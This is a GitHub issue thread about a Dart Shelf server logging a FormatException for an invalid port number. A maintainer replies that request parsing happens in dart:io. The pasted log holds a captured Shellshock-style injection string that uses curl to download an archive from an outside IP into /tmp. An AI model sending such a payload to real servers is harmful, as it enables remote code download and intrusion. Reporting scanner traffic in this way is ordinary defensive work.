### ISSUE TITLE
Invalid port number exception in log

### ISSUE THREAD

**Issue by rspilker** [dart-lang/shelf#8]
When looking at my output I noticed the exception below. However, I would expect the webserver to not throw any exceptions when parsing the requests.

It seems to be part of the "muieblackcat" scanning tool.

Since I just set up a simple test environment, I don't have any more logs. 

My setup is:
shelf 0.5.7
shelf_static: 0.2.2
shelf_route: 0.11.0+1

========================================================

```
Error parsing request.
FormatException: Invalid port number (at character 14)
http://() { :;}; echo; /usr/bin/curl -o /tmp/t.tgz http://76.76.105.26/tt.t...
             ^

dart:isolate  _RawReceivePortImpl._handleMessage
```

**Comment by nex3** [comment]
This is a `dart:io` issue. Shelf doesn't parse any requests itself; it just relies on the IO library's `HttpServer`. I'm confident that you'll be able to reproduce this without Shelf in the loop at all.
